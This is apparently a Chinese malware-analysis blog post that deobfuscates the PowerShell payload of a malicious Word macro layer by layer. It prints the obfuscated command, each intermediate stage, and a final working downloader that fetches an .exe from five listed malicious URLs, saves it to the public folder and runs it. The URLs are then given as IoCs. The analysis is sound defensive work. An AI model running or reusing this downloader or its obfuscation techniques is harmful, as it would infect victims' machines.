样本地址:

https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0/detection

样本为一个Word文件,嵌入Macros,寻找命令执行点比较简单, 稍微跟了一下直接定位到

Sub SssbuNrRrEn(UJXYrqZETb As String)

On Error Resume Next

MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)

zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoivpnn / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)

Shell UJXYrqZETb, 0

CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)

HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)

End Sub

明显可以看到UJXYrqZETb比较关键,len(UJXYrqZETb) = 3263,不能直接通过Debug - Add watch获取, 可以将UJXYrqZETb写入文件从而获取完整的UJXYrqZETb值。

Sub SssbuNrRrEn(UJXYrqZETb As String)

On Error Resume Next

MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)

zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoivpnn / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)

Set objFSO=CreateObject("Scripting.FileSystemObject")

outFile="c:\windows\temp\output.txt"

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write "test string"

objFile.Close

' Shell UJXYrqZETb, 0

CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)

HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)

End Sub

查看output.txt 获取cmd命令

cmd     hhwjquui   qwgeui   qwgeiqweqwe iqw  ohd   ioqwhd   ioqwhido  &       %C^om^S^p^Ec%          /V         /c           set %VBiwAbXNZVRf%=p^o^w^er&&set %WVXlCPwVdc%=^sh^ell&&!%VBiwAbXNZVRf%!!%WVXlCPwVdc%! " & ( $VErBOSePReFErenCe.TOSTrIng()[1,3]+'X'-joIn'')( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )

然后像洋葱一样一层一层剥开你的心:

ieX( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )


ieX(  .( ([stRINg]$VeRBoSepreFerence)[1,3]+'X'-Join'') ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((

iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+

iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMP

oS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4i

MP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP

+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S

0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP

+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i

'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iM

P/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iM

PY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+i

MPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iM

P+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiM

P+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iM

PoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+i

MPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4

YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACei

MPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([

Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118

+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAc

E(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|'))  )




ieX(  .ieX ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+iMPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iMP+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACeiMPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAcE(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|'))  )




ieX(  .ieX .((gET-vaRIAbLE '*MDr*').NamE[3,11,2]-joiN'') ( ('((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-oiMP+iM

PbjeiMP+iM'+'P'+'cY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMP'+') random;4YoiMP+iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iM

P+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPo'+'bjectYiMP+iMP4E)iMP+iMP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMP

SBiMP+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.n'+'extiMP+iMP(10000, 2iMP+iMP82133)iMP+i'+'MP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX

 = i'+'MP+iMPY4EiMP+iM'+'P iMP+iMPhtiMP+iMPtp:/iMP+iM'+'P/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFW'+'/?i'

+'MP+iMP'+'http:iMP+iMP/iMP+iMP/iMP+iMPdiMP+iMPuiMP+iMPlfaciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa

/iMP+i'+'MP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMP'+'.au/'+'kiMP+iMPRiMP+iMPBGS7'+'/?iMP+iM'+'PhttiMP+iMPps

://www.blueyachtchiMP+iMParter.com/DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+iMPzurew'+'iMP+iMPebsitesiMP+iM

P.net/oMgoZ/Y4iMP+iMPE.iMP+iMPSplit(iMP+iMPY4E?Y4E);4YiMP+iMPoSDC'+'iMP+iMP iMP+iMP= 4YiMP+iMPoi'+'MP+iMPeniMP'+'+iMPv:

publiiMP+iMPc + iMP+iMPY4iMP+iMPEiMP+iMPjPIY4E +iMP+iM'+'P 4YoNiMP+iMPSiMP+iMPB iMP+iMP+ (Y4E.eiMP+iMPxY4E+Y4EeYiMP+iMP

4E)iMP+iMP;iMP+iMPfiMP+iMPoreaiMP+iMPciMP+iMPhiMP+iMP(4Yoai'+'MP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+

iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLdliM'+'P+iMP'+'eiMP+iMPWiMP+iMP2K(4YiMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPK

i'+'MP+iMPTiM'+'P+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPInvoiMP+iMPY4'+'EiMP+iMP+Y4EkY4iMP+iM

PEiMP+iM'+'P+Y4EiMP+iMPe-IiMP+iMPteiMP+'+'iMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89

+[Char]52+[Char]69),[C'+'har]39 -cR'+'EPLACeiMPW2KiMP,[Char]34 -rEpLace  iMPjPIiMP,[Char]92  -cREPLACe([Char]52+[Char]8

9+[Char]111),[Char]3'+'6-cREPLACe([Char]118+[Char]76+[Ch'+'ar]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iM'+'PX

iMP)').rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),'|').rePLaCE('IdQ',[sTriNG][ChAR]36).rePLaCE('iMP',[sTriNG][ChAR]39) ) )


ieX(  .ieX .ieX (('4Yo'+'ns'+'a'+'dasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-o'+'bje'+'cY4E'+'+Y4EtY'+'4E'+') random;4Yo'+'YY'+'U'+' ='+' .(Y4En'+'e

Y4E+'+'Y4EwY4'+'E+Y4E-'+'objectY'+'4E)'+' Sys'+'tem'+'.Net.'+'WebC'+'lient;4YoN'+'SB'+' ='+' 4'+'Yonsada'+'sd.next'+'(1

0000, 2'+'82133)'+';4YoA'+'D'+'C'+'X = '+'Y4E'+' '+'ht'+'tp:/'+'/'+'www.elosduvale.'+'com'+'.b'+'r/OUFW/?'+'http:'+'/'+

'/'+'d'+'u'+'lfac'+'ollt'+'da'+'.'+'c'+'om/rL'+'7zkpa/'+'?http://j'+'ati.'+'c'+'o'+'m'+'.au/k'+'R'+'BGS7/?'+'htt'+'ps:/

/www.blueyachtch'+'arter.com/D'+'IjVX4U'+'/?http://re'+'viewzaap.a'+'zurew'+'ebsites'+'.net/oMgoZ/Y4'+'E.'+'Split('+'Y4

E?Y4E);4Y'+'oSDC'+' '+'= 4Y'+'o'+'en'+'v:publi'+'c + '+'Y4'+'E'+'jPIY4E +'+' 4YoN'+'S'+'B '+'+ (Y4E.e'+'xY4E+Y4EeY'+'4E

)'+';'+'f'+'orea'+'c'+'h'+'(4Yoa'+'sfc in'+' 4YoAD'+'CX'+'){t'+'ry'+'{4YoYYU.W2KDovLdW'+'nlvLd'+'OadFIvLdl'+'e'+'W'+'2K

(4Y'+'o'+'asfc'+'.W2'+'K'+'T'+'oStrvLdivLdNgW2K()'+', 4YoSD'+'C);&'+'(Y4E'+'Invo'+'Y4E'+'+Y4EkY4'+'E'+'+Y4E'+'e-I'+'te'

+'mY'+'4E)(4YoSDC)'+';break;'+'}catch{}}')  -rEpLace ([Char]89+[Char]52+[Char]69),[Char]39 -cREPLACe'W2K',[Char]34 -rEp

Lace  'jPI',[Char]92  -cREPLACe([Char]52+[Char]89+[Char]111),[Char]36-cREPLACe([Char]118+[Char]76+[Char]100),[Char]96)|

& ( $sheLLiD[1]+$shElLiD[13]+'X') )


ieX(  .ieX .ieX ($nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000

, 282133);$ADCX = ' http://www.elosduvale.com.br/OUFW/?http://dulfacolltda.com/rL7zkpa/?http://jati.com.au/kRBGS7/?http

s://www.blueyachtcharter.com/DIjVX4U/?http://reviewzaap.azurewebsites.net/oMgoZ/'.Split('?');$SDC = $env:public + '\' +

 $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item

')($SDC);break;}catch{}} |& ( $sheLLiD[1]+$shElLiD[13]+'X') )

Network IoCs:

http://www.elosduvale.com.br/OUFW/

http://dulfacolltda.com/rL7zkpa/

http://jati.com.au/kRBGS7/

https://www.blueyachtcharter.com/DIjVX4U/

http://reviewzaap.azurewebsites.net/oMgoZ/

记一次Powershell反混淆 (1)的更多相关文章

  1. 记一次powershell反混淆(2)

    样本地址 https://www.hybrid-analysis.com/sample/4b4b8b13c264c8f7d7034060e0e4818a573bebc576a94d7b13b4c174 ...

  2. .net破解一(反编译,反混淆-剥壳)

    大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以第一件事就是用Reflector编译,但是没有想 ...

  3. C# 反编译-Reflector 反混淆-De4Dot 修改dll/exe代码-reflexil

    反编译工具 Reflector 破解版下载地址:http://pan.baidu.com/s/15UwJo 使用方法:略 反混淆工具De4Dot 开源软件 下载地址http://pan.baidu.c ...

  4. js混淆 反混淆 在线

    js反混淆地址:http://www.bm8.com.cn/jsConfusion/ 在线javascript 混淆http://www.moralsoft.com/jso-online/hdojso ...

  5. net破解一(反编译,反混淆-剥壳,工具推荐)

